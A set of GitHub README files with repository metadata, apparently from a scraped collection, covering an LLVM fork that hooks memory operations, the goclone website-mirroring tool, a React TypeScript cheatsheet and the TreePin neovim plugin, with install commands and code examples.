modify LLVM IR compiled code using the `opt` tool with the `-adin` flag. Here's an example to help you understand the process: Let's assume you have a simple C code file named `example.c`. ```c int var = 0; void f(){ *(int*)0x100 = 1; var = *(int*)0x100; } ``` To compile it into LLVM IR code using Clang, execute the following command: ```shell clang -S -emit-llvm example.c -o example.ll ``` This command will generate the LLVM IR code file `example.ll` based on your C code. ```llvm ; Function Attrs: noinline nounwind optnone uwtable define dso_local void @f() #0 { store i32 1, i32* inttoptr (i64 256 to i32*), align 4 %1 = load i32, i32* inttoptr (i64 256 to i32*), align 4 store i32 %1, i32* @b, align 4 ret void } ``` Now, you can use the **ADIN LLVM Fork** to modify the LLVM IR code and add memory operation hooks. Run the following command: ```shell opt -adin -S example.ll-o adin_modified_example.ll ``` the `-adin` flag indicates that you want to perform memory operation hooking on the input LLVM IR code. The modified LLVM IR code will be written to the `modified.ll` file. ```llvm define dso_local void @f() #0 { call void @__adin_store_(i8* inttoptr (i64 256 to i8*), i64 1, i32 32, i32 4) %load_i32_ = call i64 @__adin_load_(i8* inttoptr (i64 256 to i8*), i32 32, i32 4) %truncated_i32_ = trunc i64 %load_i32_ to i32 store i32 %truncated_i32_, i32* @b, align 4 ret void } ``` In the modified LLVM IR code (`modified.ll`), the original store and load operations have been replaced with the `__adin_store_` and `__adin_load_` functions. These functions are the hook functions provided by the ADIN LLVM Fork, which allow you to intercept and modify the behavior of memory operations. You can define and implement these hook functions in C/C++ code to perform any desired modifications or additional actions before or after the memory operations. * `__adin_store_` function will be called instead of a regular store operation, * `__adin_load_` function will be called instead of a regular load operation. To implement the **__adin_store_** and **__adin_load_** hook functions in your C/C++ code for performing desired modifications or additional actions before memory operations, you can follow a similar approach to what is done in the [Address Interceptor Lib]. Here's an example: ```c extern "C" void __adin_store_(llvm_pass_addr pointer, llvm_value_type value, llvm_pass_arg TypeSizeArg, llvm_pass_arg AlignmentArg) { //... } extern "C" llvm_value_type __adin_load_(const llvm_pass_addr pointer, llvm_pass_arg TypeSizeArg, llvm_pass_arg AlignmentArg) { //... } ``` Finally, you can use the LLVM IR code to continue with the compilation process, linking, and generating the final executable or library as needed. Yes, the `opt` utility provided by the ADIN LLVM Fork also allows you to hook `memmove`, `memcpy`, and `memset` operations in addition to store and load operations. You can enable the hooking of these memory operations using specific options provided by `opt`. Here are the options you can use: ``` $ opt --help | grep adin -adin-alloca-address-skip - Skip intercept address on alloca frame (Stack var) -adin-check-normal-address-aligment - Checks normal alignment of address attempt -adin-mem-function-instructions - if equal true - intercept memmove/memcpy/memset function, else skip -adin-name-callback-load=<string> - Set name callback of load operation. Default __adin_load_ -adin-name-callback-memcpy=<string> - Set name callback of memcpy operation. Default __adin_memcpy_ -adin-name-callback-memmove=<string> - Set name callback of memmove operation. Default __adin_memmove_ -adin-name-callback-memset=<string> - Set name callback of memset operation. Default __adin_memset_ -adin-name-callback-store=<string> - Set name callback of store operation. Default __adin_store_ -adin-simple-global-skip - Skip intercept address of SIMPLE global var -adin-skip-unsupported-instructions - if equal true - skip this unsupported instruction, else throw error -adin-verbose-level=<int> - Set Level of verbose for AddressIntercept Pass ``` ## How build ### Unix-like OS **Note:** This part of guide assumes that you have a basic understanding of software development, command-line tools, and are comfortable using a Unix-like operating system such as Linux or macOS. Some commands may need to be modified slightly if you are using a different operating system. #### Prerequisites Before proceeding with the build process, make sure you have the following prerequisites installed on your system: 1. **CMake**: LLVM uses CMake(version 3.5.1 or higher) as its build system. Ensure that you have CMake installed on your system. You can download CMake from the official website: https://cmake.org/download/ 2. **GCC or Clang**: LLVM is primarily written in C++. You will need a C++ compiler to build LLVM. Ensure that you have either GCC or Clang installed on your system. 3. **Git**: You need Git version control system to clone the LLVM Adin Fork repository and manage source code. Install Git by following the instructions on the official website: https://git-scm.com/downloads 4. **Python**: LLVM build system relies on Python. Ensure that Python is installed on your system. You can download Python from the official website: https://www.python.org/downloads/ 5. **Ninja (optional)**: Ninja is an alternative build system to Make. While not mandatory, it can speed up the build process. If you want to use Ninja, install it using your system's package manager. I tested on ubuntu 16.04 OS #### Building LLVM Adin Fork Follow the steps below to build your LLVM Adin Fork: ##### Step 1: Clone the Repository 1. Open a terminal or command prompt. 2. Change to the directory where you want to clone the LLVM Adin Fork repository. 3. Clone the repository using the following command: ``` git clone --recurse-submodules https://github.com/remotemcu/adin-llvm ``` ##### Step 2: Configure the Build 1. Change to the LLVM Adin Fork directory: ``` cd adin-llvm ``` 2. Create a build directory: ``` mkdir build cd build ``` 3. Generate the build files using CMake: ``` cmake .. -DCMAKE_BUILD_TYPE=MinSizeRel -DLLVM_BUILD_RUNTIME=Off -DLLVM_INCLUDE_TESTS=Off -DLLVM_INCLUDE_EXAMPLES=Off -DLLVM_ENABLE_BACKTRACES=Off -DLLVM_TARGETS_TO_BUILD="host" -DLLVM_ENABLE_OCAMLDOC=Off -DLLVM_BUILD_UTILS=Off -DLLVM_BUILD_DOCS=Off ``` Replace `<generator>` with the appropriate generator for your system. For example, on Linux, you can use `"Unix Makefiles"` for Make or `"Ninja"` for Ninja. ![ubuntu_cmake.png](docs/ubuntu_cmake.png) **Note:** If you are using Ninja: ``` cmake -G Ninja .. -DCMAKE_BUILD_TYPE=MinSizeRel -DLLVM_BUILD_RUNTIME=Off -DLLVM_INCLUDE_TESTS=Off -DLLVM_INCLUDE_EXAMPLES=Off -DLLVM_ENABLE_BACKTRACES=Off -DLLVM_TARGETS_TO_BUILD="host" -DLLVM_ENABLE_OCAMLDOC=Off -DLLVM_BUILD_UTILS=Off -DLLVM_BUILD_DOCS=Off ``` ##### Step 3: Build LLVM 1. Build LLVM using the generated build files: ``` cmake --build . --config MinSizeRel ``` 2. Grab a cup of coffee or tea as the build process might take some time depending on your system's speed and available resources. 3. Once the build is successfully completed, you can proceed to use the ADIN LLVM Adin Fork as desired. The built binaries can be found in the `build/bin` directory. ![opt.PNG](docs/opt-ubuntu.png) To locate the **opt** utility, which can be used for modifying LLVM intermediate representations, follow the steps below: * Open a file explorer or command prompt. * Navigate to the `build/bin` directory within your LLVM Adin Fork repository. * Look for the `opt` executable file. The exact file extension may vary depending on your operating system (e.g., .exe for Windows). ### Windows OS Note that this guide assumes you are building on a Windows system and requires MSBuild from Visual Studio 2017. #### Prerequisites Before proceeding with the LLVM Adin Fork build, ensure that you have the following prerequisites installed on your Windows machine: 1. **MSBuild:** Install Microsoft Build Tools or Visual Studio 2017. You can download Visual Studio 2017 Community Edition from the official Microsoft website: [https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2017/install/use-command-line-parameters-to-install-visual-studio?view=vs-2017](https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2017/install/use-command-line-parameters-to-install-visual-studio?view=vs-2017). Make sure to select the required these components during the installation. ![start_menu.PNG](docs/vc-components.PNG) I build with next version: ``` -- Selecting Windows SDK version 10.0.17763.0 to target Windows 10.0.17134. -- The C compiler identification is MSVC 19.16.27050.0 -- The CXX compiler identification is MSVC 19.16.27050.0 ``` 2. **Python:** Install Python on your system. You can download the latest Python version from the official Python website: [https://www.python.org/downloads/windows/](https://www.python.org/downloads/windows/). Choose the appropriate version for your system (64-bit) and follow the installation instructions. 3. **Git:** Install Git version control system. You can download Git from the official Git website: [https://git-scm.com/downloads](https://git-scm.com/downloads). Choose the appropriate installer for your system and run the installation. #### Building LLVM Adin Fork Once you have installed the necessary prerequisites, follow the steps below to build the LLVM Adin Fork: 1. **Clone the LLVM Adin Fork Repository:** Open a command prompt or Git Bash and navigate to the directory where you want to clone the LLVM Adin Fork repository. Then, run the following command to clone the repository: ```shell git clone --recurse-submodules https://github.com/remotemcu/adin-llvm ``` 2. Open "x64 Native Tools Command Prompt for Visual Studio 2017" entry to open the command prompt. ![vc-components.PNG](docs/start_menu.PNG) 3. In the command prompt window, navigate to the directory where you build the LLVM Adin Fork repository using the `cd` command. For example, if the cloned repository is located in `C:\llvm-adin` create `C:\llvm-adin-build` for building process ![cmd_cd.PNG](docs/cmd_cd.PNG) Make sure to replace `C:\llvm-adin` with the actual path to your LLVM Adin Fork repository. 4. **Configure the Build:** Run the following command from build dir (for example C:\llvm-fork-build) to generate the build files using CMake: ```shell cmake -Thost=x64 C:\llvm-adin -DCMAKE_BUILD_TYPE=MinSizeRel -DLLVM_BUILD_RUNTIME=Off -DLLVM_INCLUDE_TESTS=Off -DLLVM_INCLUDE_EXAMPLES=Off -DLLVM_ENABLE_BACKTRACES=Off -DLLVM_TARGETS_TO_BUILD="host" -DLLVM_ENABLE_OCAMLDOC=Off -DLLVM_BUILD_UTILS=Off -DLLVM_BUILD_DOCS=Off ``` ![screenshot cmd](docs/adin-cm-build.PNG) This command configures the build system for Visual Studio 2017. Adjust the generator (`-G`) argument if you are using a different version of Visual Studio. 5. **Build LLVM:** Once the configuration is complete, you can build LLVM by running the following command: ```shell cmake --build . --config MinSizeRel ``` Once the build is successfully completed, you can proceed to use the ADIN LLVM Adin Fork as desired. The built binaries can be found in the `MinSizeRel\build\bin` directory. To locate the **opt** utility, which can be used for modifying LLVM intermediate representations, follow the steps below: * Open a file explorer or command prompt. * Navigate to the `MinSizeRel\build\bin` directory within your LLVM Adin Fork repository. * Look for the `opt` executable file. The exact file extension may vary depending on your operating system (e.g., .exe for Windows). ![screenshot cmd](docs/windows-opt-build.PNG) --- LLVM is open source software. You may freely distribute it under the terms of the license agreement found in LICENSE.txt.
32
1
shurco/goclone
https://github.com/shurco/goclone
🌱 goclone - clone websites in a matter of seconds
# 🌱 goclone <a href="https://github.com/shurco/goclone/releases"><img src="https://img.shields.io/github/v/release/shurco/goclone?sort=semver&label=Release&color=651FFF"></a> <a href="https://goreportcard.com/report/github.com/shurco/goclone"><img src="https://goreportcard.com/badge/github.com/shurco/goclone"></a> <a href="https://www.codefactor.io/repository/github/shurco/goclone"><img src="https://www.codefactor.io/repository/github/shurco/goclone/badge" alt="CodeFactor" /></a> <a href="https://github.com/shurco/goclone/actions/workflows/release.yml"><img src="https://github.com/shurco/goclone/actions/workflows/release.yml/badge.svg"></a> <a href="https://github.com/shurco/goclone/blob/master/LICENSE"><img src="https://img.shields.io/badge/License-MIT-yellow.svg"></a> Goclone is a powerful utility that enables you to effortlessly download entire websites from the Internet and save them to your local directory. With Goclone, you can easily obtain HTML, CSS, JavaScript, images, and other associated files directly from the server and store them on your computer. One of the standout features of Goclone is its ability to accurately preserve the original website's relative link structure. This means that when you open any page of the "mirrored" website in your browser, you can seamlessly navigate through the site by following links just as if you were browsing it online. Goclone empowers you to have offline access to websites, making it convenient for various purposes such as research, archiving, or simply enjoying a website without an internet connection. So go ahead, give Goclone a try and experience the freedom of having your favorite websites at your fingertips, even when you're offline! ![Example](/.github/media/example.gif) <a name="manual"></a> ### Manual ```bash # go get :) go get github.com/shurco/goclone # change to project directory using your GOPATH cd $GOPATH/src/github.com/shurco/goclone/cmd # build and install application go install ``` <a name="examples"></a> ## Examples ```bash # goclone <url> goclone https://domain.com ``` <a name="usage"></a> ## Usage ``` Usage: goclone <url> [flags] Flags: -b, --browser_endpoint string chrome headless browser WS endpoint -c, --cookie if set true, cookies won't send -h, --help help for goclone -o, --open automatically open project in default browser -p, --proxy_string string proxy connection string -r, --robots disable robots.txt checks -s, --serve serve the generated files using gofiber -P, --servePort int serve port number (default 8088) -u, --user_agent string custom User-Agent (default "goclone") -v, --version version for goclone ``` ## Making JS Rendered Requests JS Rendered requests can be made using ```-b``` flag. For example start image : ``` bash docker run -d -p 9222:9222 --rm --name headless-shell chromedp/headless-shell ``` then run goclone: ```bash goclone -b "ws://localhost:9222" https://domain.com ```
30
1
ibnumusyaffa/simple-react-typescript-cheatsheet
https://github.com/ibnumusyaffa/simple-react-typescript-cheatsheet
Simple & Opiniated React x Typescript Cheatsheet
# Simple React Typescript Cheatsheet - [Simple React Typescript Cheatsheet](#simple-react-typescript-cheatsheet) - [Typing props with inline type](#typing-props-with-inline-type) - [Typing props with Type](#typing-props-with-type) - [Typing props with default value](#typing-props-with-default-value) - [Typing props with children](#typing-props-with-children) - [Using Native HTML props to React Components](#using-native-html-props-to-react-components) - [1. Basic](#1-basic) - [2. Combine with your type](#2-combine-with-your-type) - [3. Overriding Native Props](#3-overriding-native-props) - [4. Extracting Props from Custom Components](#4-extracting-props-from-custom-components) - [Typing Event Handlers from native element](#typing-event-handlers-from-native-element) - [useState](#usestate) - [useCallback](#usecallback) - [useRef](#useref) - [Basic useRef](#basic-useref) - [useRef with HTML element](#useref-with-html-element) - [useRef with forwardRef](#useref-with-forwardref) - [Making a Read-Only Ref Mutable](#making-a-read-only-ref-mutable) - [useReducer](#usereducer) - [Context](#context) - [Polymorphic](#polymorphic) - [Types or Interfaces?](#types-or-interfaces) - [Resources](#resources) ## Typing props with inline type ```tsx function Button(props: { children: React.ReactNode }) { return <button>{props.children}</button>; } ``` ## Typing props with Type ```tsx // you can use interface too type ButtonProps = { className: string; children: React.ReactNode; }; function Button(props: ButtonProps) { return <button className={props.className}>{props.children}</button>; } // with destructuring function OtherButton({ className, ...props }: ButtonProps) { return <button className={className}>{props.children}</button>; } ``` ## Typing props with default value ```tsx type ButtonProps = { disabled?: boolean; className: string; children: React.ReactNode; }; function Button({ disabled = true, ...props }: ButtonProps) { return ( <button disabled={disabled} {...props}> {props.children} </button> ); } ``` ## Typing props with children ```tsx type ButtonProps = { // accept everything React can render children: React.ReactNode; }; function Button(props: ButtonProps) { return <button>{props.children}</button>; } ``` ## Using Native HTML props to React Components ### 1. Basic ```tsx import React, { ComponentProps } from "react"; //ComponentProps<"button"> : get all type/props from native button element function Button(props: ComponentProps<"button">) { return <button>{props.children}</button>; } ``` ### 2. Combine with your type ```tsx import React, { ComponentProps } from "react"; type ButtonProps = ComponentProps<"button"> & { variant: "primary" | "secondary"; }; function Button(props: ButtonProps) { return <button {...props}>{props.children}</button>; } ``` ### 3. Overriding Native Props ```tsx import React, { ComponentProps } from "react"; //remove onChange property from input with Omit<Type, Keys> and combine with new type type InputProps = Omit<ComponentProps<"input">, "onChange"> & { onChange: (value: string) => void; }; function Input(props: InputProps) { return <input {...props} />; } ``` ### 4. Extracting Props from Custom Components Useful when author of some external library dont export the type definition ```tsx import { ComponentProps } from "react"; import { Navbar } from "some-ui-library"; type NavBarProps = ComponentProps<typeof NavBar>; ``` ## Typing Event Handlers from native element Hover native html props in VSCode, you can copy paste the type definition ```tsx type ButtonProps = { other?: Boolean; onClick?: React.MouseEventHandler<HTMLButtonElement>; }; ``` ![event handler](event-handler.png "event handler") ## useState ```tsx // ❌ Typescript already know `text` type is string const [text, setText] = useState<string>(""); // ✅ no need to tell typescript, only work with primitive value const [text, setText] = useState(""); ``` ```tsx type Tag = { id: number; value: string; }; const [tags, setTags] = useState<Tag[]>([]); ``` ```tsx // data : Data | undefined const [data, setData] = useState<Data>(); // data : Data | undefined const [data, setData] = useState<Data>(undefined); // data : Data | null const [data, setData] = useState<Data | null>(null); ``` ## useCallback ```tsx function App(props: { id: number }) { const handleClick = useCallback( //⬇️ add type here (message: string) => { console.log("name"); }, [props.id] ); return ( <div> <p>{message}</p> <button onClick={() => handleClick("hello")}>button 1</button> <button onClick={() => handleClick("hello")}>button 2</button> </div> ); } ``` ## useRef ### Basic useRef ```tsx export const Component = () => { // pass type if it doesn't have initial value const id1 = useRef<string>(); // no need to pass type if it have initial value const id2 = useRef(""); useEffect(() => { id1.current = "Random value!"; }, []); return <div></div>; }; ``` ### useRef with HTML element you can hover over the type of ref in the element to check what it accepts in your editor ```tsx export const Component1 = () => { // add null to initial value const ref = useRef<HTMLAudioElement>(null); //(property) React.ClassAttributes<HTMLAudioElement>.ref?: React.LegacyRef<HTMLAudioElement> | undefined return <audio ref={ref} />; }; ``` alternative using `ElementRef` type helper ```tsx import { useRef, ElementRef } from "react"; import { OtherComponent } from "./other-component"; // the easy alternative, you can use ElementRef const Component1 = () => { const audioRef = useRef<ElementRef<"audio">>(null); return <audio ref={audioRef}>Hello</audio>; } // you can use ElementRef for component too type OtherComponentRef = ElementRef<typeof OtherComponent>; const Component2 = () => { const ref = useRef<OtherComponentRef>(null); return <OtherComponent ref={ref}>Hello</OtherComponent>; }; ``` ### useRef with forwardRef ```tsx type InputProps = { className: string; }; const MyInput = React.forwardRef<HTMLInputElement, InputProps>((props, ref) => { return <input ref={ref} className={props.className} />; }); // add displayName if you are using function expression, so its has a name in React Devtool MyInput.displayName = "MyInput"; function App() { const input = React.useRef<HTMLInputElement>(null); useEffect(() => { // focus to input element on first render if (input.current) { input.current.focus(); } }, []); return <MyInput className="input-style" ref={input} />; } ``` ### Making a Read-Only Ref Mutable ```tsx export const Component = () => { const ref1 = useRef<string>(null); // if you pass null to initial value // this not allowed to change directly ref1.current = "Hello"; const ref2 = useRef<string>(); // if initial value is undefined this is allowed to change (mutable) ref2.current = "Hello"; return null; }; ``` ## useReducer You can use [Discriminated Unions](https://www.totaltypescript.com/discriminated-unions-are-a-devs-best-friend) for reducer actions. Don't forget to define the return type of reducer, otherwise TypeScript will infer it. ```tsx import { useReducer } from "react"; const initialState = { count: 0 }; type ACTIONTYPE = | { type: "increment"; payload: number } | { type: "decrement"; payload: string }; function reducer(state: typeof initialState, action: ACTIONTYPE) { switch (action.type) { case "increment": return { count: state.count + action.payload }; case "decrement": return { count: state.count - Number(action.payload) }; default: throw new Error(); } } function Counter() { const [state, dispatch] = useReducer(reducer, initialState); return ( <> Count: {state.count} <button onClick={() => dispatch({ type: "decrement", payload: "5" })}> - </button> <button onClick={() => dispatch({ type: "increment", payload: 5 })}> + </button> </> ); } ``` ## Context ```tsx import { createContext, useState } from "react"; type ThemeContextType = "light" | "dark"; const ThemeContext = createContext<ThemeContextType | null>(null); //if you have proper default value, you dont need specify null //const ThemeContext = createContext<ThemeContextType>("light"); const useTheme = () => { const theme = useContext(ThemeContext); if (!theme) { throw new Error( "useTheme has to be used within <ThemeContext.Provider>" ); } return theme; }; const App = () => { const [theme, setTheme] = useState<ThemeContextType>("light"); return ( <ThemeContext.Provider value={theme}> <MyComponent /> </ThemeContext.Provider> ); }; const SomeComponent = () => { // since the value has been checked inside useTheme, no need checking null value const theme = useTheme(); return <p>current theme: {theme}.</p>; }; ``` ## Polymorphic Imagine a `Button` component that renders a `<button>` element, but with your fancy button styles. If want to render the Button component as an a other element we might have an API like: ```tsx <Button variantColor="primary" href="https://blog.makerx.com.au/" as="a"> Click me </Button> ``` This looks nice, but its not work realy well with typescript. here the alternative using `radix-ui/react-slot` ```tsx // Button.tsx import { Slot } from '@radix-ui/react-slot' type ButtonProps = React.ComponentPropsWithoutRef<'button'> & { variantColor: 'primary' | 'secondary' | 'danger' asChild?: boolean } export const Button = React.forwardRef<HTMLButtonElement, ButtonProps>((props, forwardedRef) => { const { variantColor, asChild, ...buttonProps } = props const Component = (asChild ? Slot : 'button') as 'button' return ( <Component {...buttonProps} ref={forwardedRef} className={clsx( // ... )} /> ) } // App.tsx function App() { return ( <div> {/* asChild must be true */} <Button variantColor="primary" asChild> {/* render button component as link */} <a href="https://google.com">About</a> </Button> </div> ) } ``` ## Types or Interfaces? `interface`s are different from `type`s in TypeScript, but they can be used for very similar things as far as common React uses cases are concerned. Here's a helpful rule of thumb: - Always use `interface` for public API's definition when authoring a library or 3rd party ambient type definitions. - Consider using `type` for your React Component Props and State, because it is more constrained. Types are useful for union types (e.g. `type MyType = TypeA | TypeB`) whereas Interfaces are better for declaring dictionary shapes and then `implementing` or `extending` them. ## Resources - [React Total Typescript](https://www.totaltypescript.com/tutorials/react-with-typescript) - [Discriminated Unions are a Frontend Dev's Best Friend](https://www.totaltypescript.com/discriminated-unions-are-a-devs-best-friend) - [Other React TypeScript Cheatsheets ](https://react-typescript-cheatsheet.netlify.app/)
172
8
KaitlynEthylia/TreePin
https://github.com/KaitlynEthylia/TreePin
A lightweight neovim plugin for pinning fragments of code to the screen.
# TreePin A lightweight neovim plugin for pinning fragments of code to the screen. ## Install ### Lazy ``` { 'KaitlynEthylia/TreePin', dependencies = 'nvim-treesitter/nvim-treesitter', init = function() require('treepin').setup() end, } ``` ### Packer ```lua use { 'KaitlynEthylia/TreePin', requires = {'nvim-treesitter/nvim-treesitter'}, config = function() require('treepin').setup() end, } ``` ### Plug ```lua Plug 'nvim-treesitter/nvim-treesitter' Plug 'KaitlynEthylia/TreePin' ``` ## Demo [Temporarily unavailable because technology is difficult, alternatively can be viewed on [imgur](https://i.imgur.com/aLNgm5D.mp4)] ## Setup --- Treepin will do nothing until the setup function is called. The setup function may be called with no args, or a table of configuration options, the default configuration is shown below. ```lua require('treepin').setup { hide_onscreen = true, -- Hide's the pin buffer when the text of the pin is visible. max_height = 30, -- Prevents the pin buffer from displaying when the pin is larger than x lines. position = 'relative', -- May be 'relative', 'top', or 'bottom'. Determines the position of the pin buffer within the window. icon = '>', -- The icon to display in the sign column at the top of the pin. Set to nil to prevent the sign column being used. zindex = 50, -- The Z-index of the pin buffer. separator = nil, -- A single character that may be used as a separator between the editing buffer and the pin buffer. } ``` ## Commands | Command | Lua Function | Description | | ------- | ------------ | ----------- | | TPPin | `treepin.pinLocal()` | Sets the window's pin at the treesitter node under the cursor. | | TPRoot | `treepin.pinRoot()` | Sets the window's pin at the second largest treesitter node under the cursor (the largest is the file itself). | | TPGrow | `treepin.pinGrow()` | Expands the pin to the next parent treesitter node that sits on a different line. | | TPShrink | `treepin.pinShrink()` | Reverses the effect of growing the pin. Cannot be shrunk smaller than the node under the cursor when the pin was created. | | TPClear | `treepin.pinClear()` | Removes the pin buffer and the pin itself. | | TPGo | `treepin.pinGo()` | Jump to the first line of the pin. | | TPShow | `treepin.pinShow()` | Called automatically when a pin is created. Enables displaying the pin buffer. | | TPHide | `treepin.pinHide()` | Hides the pin buffer but keeps the pin stored. | | TPToggle | `treepin.pinToggle()` | Either runs pinHide or pinShow depending on whether the pin is visible. | Although there is no user command for it, the `treepin.pin(winnr, base, grow, bufnr)` function is also available for anyone who want's to create an arbitrary pin in script. The arguments are detailed in doc comments. Keybindings are down to the user to set themselvs. ## Future Several features have already been considered for future versions, particularly: - More scripting utilities in order to integrate with other tools better. - The ability to save pin history and jump between them. If this is implemented it may be its own plugin - The ability to move the pin to adjacent treesitter nodes. ### Note These are not promises. The first one is very likely to happen however as it alone could introduce the ability for external code to implement the others. ## Contributing All contributions are welcome! Just follow common sense ettiquete and we can create something that works.
26
1